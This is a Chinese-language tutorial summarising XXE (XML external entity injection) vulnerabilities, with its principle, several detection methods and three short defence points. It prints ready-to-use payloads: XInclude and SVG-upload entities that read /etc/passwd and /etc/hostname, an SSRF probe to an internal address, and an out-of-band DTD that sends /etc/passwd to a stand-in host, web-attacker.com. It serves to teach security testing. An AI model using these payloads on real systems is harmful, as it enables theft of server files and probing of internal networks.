XXE外部实体注入漏洞总结

XXE

　　productId=1&storeId=1 ，当我们抓包分析数据时，有参数传递时，我们不仅要测是否存在sql注入，也可以看看是否有xxe。有时在前端是正常传数据，但是在服务器端就会将我们的参数值嵌入到了xml文档中进行解析，此时就有可能存在xxe漏洞。

漏洞原理

　　XXE是xml外部实体注入漏洞，应用程序解析xml输入时，没有禁止外部实体的加载，导致可加载恶意外部文件和代码，造成任意文件读取，命令执行，内网端口扫描攻击内网网站等危害。

漏洞危害

　　1. 读取敏感文件。

　　2. 执行ssrf漏洞，进行内网端口探测，攻击内网网站等。

漏洞检测

　　1. XInclude攻击

　　　一些应用程序接收用户的数据，在服务端嵌入到xml文档中解析。

　　　这时我们无法控制整个xml文档，所以就无法定义或修改DOCTYPE元素。XInclede是xml规范的一部分，允许从子文档中构建xml文档，从而进行攻击。

直接将参数改为下面的值，
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>　

原来的参数值就是 productId=1，我们怎么能知道在服务端嵌入到了xml文档中解析。所以，遇到这种参数，我们除了试一下sql注入，还能试是否存在xxe。

 

　　2. 利用文件上传来进行xxe攻击

　　　docx和svg等都是基于xml格式，如果图像处理库支持SVG图像，攻击者可以提交恶意的SVG图像，就可以利用文件上传执行xxe攻击。

　　　创建具有xml代码的SVG图像

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

　　　将此图像上传上去。就可以在头像中看到/etc/hostname文件的内容。

　　3. 通过修改请求包的文件内容类型来进行xxe攻击

　　　有些应用程序会允许xml的内容类型，我们就可以修改Content-Type: text/xml字段，来利用xxe漏洞。

POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52

<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>

原来的请求体中的内容是：foo=bar

　　4. 读取敏感文件

　　　利用file协议读取服务器中的敏感文件。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
#在参数位置输入&xxe;就行。
<stockCheck><productId>&xxe;</productId></stockCheck>

　　5. 执行ssrf攻击

　　　利用http协议，让存在xxe漏洞的应用程序向与它处于同一内网的发送http请求。

　　　也可以利用其他协议，例如：ftp ，data，等。

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://192.168.1.1:3389"> ]>

 　　6. 带外通道技术来进行盲注xxe

　　　一般情况下，虽然存在xxe漏洞，但是不会回显外部实体注入的值，我们就要利用带外通道技术。（OOB)

　　攻击者在vps中放置恶意的DTD，让存在漏洞的应用程序去访问。

恶意DTD（外部实体）内容：访问http://web-attacker.com/malicious.dtd可以访问到改DTD

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">
%eval;
%exfiltrate;

　　向存在漏洞的应用程序中输入：

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://web-attacker.com/malicious.dtd"> %xxe;]>

　　7. 通过错误消息读取文件从而利用盲注xxe。

　　　通过触发xml解析错误，在解析错误信息中返回我们需要读取的敏感信息。

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

漏洞防御

　　1. 使用开发语言提供的禁用外部实体的方法。

　　2. 过滤用户输入的xml数据中的关键字。

　　3. 不允许xml中有用户自定义的文档类型。